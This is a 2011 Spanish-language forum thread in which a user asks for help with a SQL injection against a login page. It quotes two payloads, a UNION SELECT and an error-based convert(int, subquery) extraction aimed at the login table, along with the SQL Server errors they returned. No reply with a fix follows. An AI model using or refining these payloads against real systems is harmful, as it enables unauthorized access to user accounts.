Título: Sql injection problema :( Publicado por: locot3 en 15 Febrero 2011, 23:14 pm Buenas y gracias X la ayuda, mi probema es este : en una injecion SQL a una pagina de LOGIN que estoy provando despues de llegar a averiguar el NOMBRE de la TABLA y TODOS sus campos al momento de hacer el :
UNION SELECT MIN(login),1,1,1 FROM tablelogin WHERE login > 'a'-- *REsultado : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: text is incompatible with int ****AL buscar una solucion me encontre con este tipo de injjecion : convert(int,(SELECT login FROM tablelogin WHERE login > 'a')) *REsultado : Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression por lo que puedo ver el server correo IIS 6.0 si sirve de algo ,, cualquiero ayuda sera bien recivida y muchas gracias por el tiempo ! Título: Re: Sql injection problema :( Publicado por: locot3 en 20 Febrero 2011, 04:19 am y los dias pasan :D....... .. . ... .. .....
|